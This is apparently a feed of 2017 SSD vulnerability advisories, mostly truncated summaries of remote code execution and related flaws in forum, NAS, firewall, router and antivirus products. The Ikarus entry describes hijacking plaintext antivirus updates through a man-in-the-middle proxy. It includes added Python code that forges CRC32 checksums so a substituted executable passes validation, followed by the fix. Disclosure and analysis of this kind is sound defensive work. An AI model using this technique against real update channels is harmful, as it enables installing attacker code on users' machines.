SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution

Credit to Author: SSD / Maor Schwartz | Date: Wed, 13 Dec 2017 10:11:35 +0000

Vulnerability Summary The following advisory describes an unauthenticated file inclusion vulnerability that leads to remote code execution, found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and the MySQL database server. vBulletin powers many of the largest social sites … Continue reading SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution

SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution

Credit to Author: SSD / Maor Schwartz | Date: Mon, 11 Dec 2017 10:16:42 +0000

Vulnerability Summary The following advisory describes a memory corruption vulnerability that can lead to unauthenticated remote code execution in QNAP QTS versions 4.3.x and 4.2.x, including 4.3.3.0299. QNAP Systems, Inc. is “a Taiwanese corporation that specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, … Continue reading SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution

SSD Advisory – Endian Firewall: From Stored XSS to Remote Command Execution

Credit to Author: SSD / Maor Schwartz | Date: Mon, 11 Dec 2017 09:17:06 +0000

Vulnerability Summary The following advisory describes a stored XSS vulnerability in Endian Firewall version 5.0.3 which, when successfully exploited, leads to remote code execution. Endian Firewall is “a security-focused Linux distribution: a standalone, unified security management operating system. Endian Firewall is based on a hardened Linux operating system.”

Credit An independent security researcher reported this vulnerability to Beyond Security’s SSD.

Vendor response The vendor has released a patch for this vulnerability. For more information: https://help.endian.com/hc/en-us/articles/115012996087

Vulnerability Details Endian Firewall is a Linux-based firewall/gateway. It uses colours to label its trusted, untrusted and DMZ networks: Green – trusted network; Red – untrusted network; Orange – DMZ; Blue – WiFi. User-controlled input is not sufficiently sanitized. When an email is sent from the untrusted network (red) to a mail server in the DMZ (orange), Endian Firewall quarantines the email coming from the untrusted network. When a user on the trusted network (green) then logs into the Endian Firewall WebAdmin and inspects the quarantined email (Services > Mail Quarantine > quarantine), the stored XSS script executes.

Proof of Concept Setting up the environment: install the Endian Firewall virtual machine and assign the firewall network interfaces the following IPs: Green – 192.168.0.190; Red – 192.168.0.192. Set the following passwords: Web administrator (admin/Password1), SSH administrator (root/Password1). Connect to the WebAdmin interface, add the ORANGE network and change the GREEN … Continue reading SSD Advisory – Endian Firewall: From Stored XSS to Remote Command Execution

SSD Advisory – Dasan Unauthenticated Remote Code Execution

Credit to Author: SSD / Maor Schwartz | Date: Wed, 06 Dec 2017 06:42:29 +0000

Vulnerability Summary The following advisory describes a buffer overflow that leads to remote code execution, found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146. The Dasan Networks GPON ONT WiFi Router “is an indoor-type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That … Continue reading SSD Advisory – Dasan Unauthenticated Remote Code Execution

SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities

Credit to Author: SSD / Maor Schwartz | Date: Mon, 04 Dec 2017 09:37:02 +0000

Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in the Coredy CX-E120 Repeater. The Coredy CX-E120 WiFi Range Extender is “a multifunction network device which can be used for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender … Continue reading SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities

SSD Advisory – ZTE ZXDSL Configuration Reset

Credit to Author: SSD / Maor Schwartz | Date: Tue, 28 Nov 2017 13:18:47 +0000

Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. The ZXDSL 831CII is “an ADSL access device that supports multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible with ADSL, and even offers auto-negotiation capability for different flavors (G.dmt, T1.413 Issue 2) according to the central office DSLAM’s settings … Continue reading SSD Advisory – ZTE ZXDSL Configuration Reset

SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

Credit to Author: SSD / Maor Schwartz | Date: Mon, 27 Nov 2017 13:45:53 +0000

Vulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is “a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks: Create different types … Continue reading SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

SSD Advisory – Ikraus Anti Virus Remote Code Execution

Credit to Author: SSD / Maor Schwartz | Date: Mon, 27 Nov 2017 07:50:39 +0000

Vulnerability Summary The following advisory describes a remote code execution vulnerability found in Ikarus Anti Virus 2.16.7. IKARUS anti.virus “protects your personal data and your PC against all kinds of malware. In addition, the anti-spam module protects the user against spam and against malware carried in e-mail. Choose the award-winning IKARUS scan engine and protect yourself effectively against cyber criminals. IKARUS is the best scan engine in the world, detecting unknown and known threats every day.”

Credit An independent security researcher reported this vulnerability to Beyond Security’s SSD.

Vendor response Update 1: CVE: CVE-2017-15643. The vendor has released patches for these vulnerabilities. For more information: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/

Vulnerability Details A network attacker (man-in-the-middle) can achieve remote code execution on a computer running Ikarus anti-virus. Ikarus AV for Windows performs updates over plaintext HTTP, using a CRC32 checksum together with an “update” value to validate the downloaded file. Ikarus also checks the update version number, so by incrementing that number an attacker can push the update process into fetching a new update. The executable that performs updates in Ikarus is guardxup.exe. guardxup.exe sends its update request to the update server over port 80, and the server answers with a response that carries the current “update” value. Through the proxy, we modify that response by incrementing the “update” value by 1 and forward it to the client. The client then requests the update from this URL: http://mirror04.ikarus.at/updates/guardxup001005048.full. The Ikarus server returns a 404 for it, but we rewrite that 404 response into the IKUP format and forward the rewritten response to the client, where it replaces guardxup.exe with our executable.

Proof of Concept Install mitmproxy 0.17: pip install mitmproxy==0.17. To use this script, route the client’s port 80 traffic through the man-in-the-middle host running in transparent proxy mode, and set your firewall rules to redirect that traffic to port 8080 where the proxy listens. Then run the script: ./poc.py file_to_deploy.exe
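The update mechanism described above relies on plaintext HTTP, a CRC32 checksum and a version counter, all delivered over the same unauthenticated channel. The following Python example is added here as an illustration and is not code from SSD, the researcher or IKARUS; it does not reproduce the IKUP format, which this page does not show. It models a client that validates a downloaded file only by CRC32 and shows two things: first, that an attacker who controls the response simply recomputes the checksum for the substituted file; second, going one step beyond the advisory, that even a CRC32 the client already knows (say, pinned from an earlier manifest) can be matched by appending four computed bytes to the attacker's file, because CRC32 is a linear code and not a cryptographic integrity check. The "genuine" and "attacker" payloads are constructed byte strings, and the model client (`client_accepts`) is an assumption, not the product's code.

```python
import zlib

# Standard reflected CRC-32 table (polynomial 0xEDB88320), identical to zlib's.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)

# For CRC-32 the high byte of each table entry is distinct, so this dict
# inverts "table index -> high byte of table entry".
HIGH_BYTE_TO_INDEX = {entry >> 24: n for n, entry in enumerate(CRC_TABLE)}
assert len(HIGH_BYTE_TO_INDEX) == 256


def crc32(data: bytes) -> int:
    """Unsigned CRC32, as zlib computes it."""
    return zlib.crc32(data) & 0xFFFFFFFF


def client_accepts(payload: bytes, advertised_crc: int) -> bool:
    """Model (assumption) of a client that checks a download only against a CRC32."""
    return crc32(payload) == advertised_crc


def mitm_rewrite_manifest(attacker_payload: bytes) -> tuple:
    """Attacker who controls the HTTP response: ship own file plus its own CRC32."""
    return attacker_payload, crc32(attacker_payload)


def forge_crc32_suffix(data: bytes, target: int) -> bytes:
    """Return 4 bytes s such that crc32(data + s) == target.

    Undo the last four table-driven CRC steps from the desired final register:
    each step's table index is recovered from the register's high byte, which
    fixes the four indices the appended bytes must select. Then walk forward
    from the real register state and pick each byte so it selects that index.
    """
    register = crc32(data) ^ 0xFFFFFFFF      # undo the final XOR -> raw register
    wanted = target ^ 0xFFFFFFFF

    indices = []
    t = wanted
    for _ in range(4):
        idx = HIGH_BYTE_TO_INDEX[t >> 24]
        indices.append(idx)
        t = ((t ^ CRC_TABLE[idx]) << 8) & 0xFFFFFFFF
    indices.reverse()                        # recovered last-to-first

    suffix = bytearray()
    for idx in indices:
        suffix.append((register ^ idx) & 0xFF)           # byte selecting idx
        register = CRC_TABLE[idx] ^ (register >> 8)      # forward CRC step
    assert register == wanted
    return bytes(suffix)


def mitm_match_pinned_crc(attacker_payload: bytes, pinned_crc: int) -> bytes:
    """Attacker who cannot change the checksum the client expects: pad the file
    so its CRC32 collides with the pinned value. Four trailing bytes past the
    last section of a PE are overlay data and do not affect loading."""
    return attacker_payload + forge_crc32_suffix(attacker_payload, pinned_crc)


if __name__ == "__main__":
    # Constructed stand-ins for the real update files.
    genuine = b"MZ\x90\x00 genuine guardxup update body"
    evil = b"MZ\x90\x00 attacker supplied executable, different length"

    body, advertised = mitm_rewrite_manifest(evil)
    print("rewritten manifest accepted:", client_accepts(body, advertised))

    pinned = crc32(genuine)
    padded = mitm_match_pinned_crc(evil, pinned)
    print("padded file matches pinned CRC32:", client_accepts(padded, pinned))
```

Neither variant is stopped by a version counter, since the attacker sets that too. What breaks this attack is a signature over the update file verified with a key baked into the client, or at minimum a TLS channel with server authentication; a checksum chosen for error detection gives no integrity against an active attacker.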
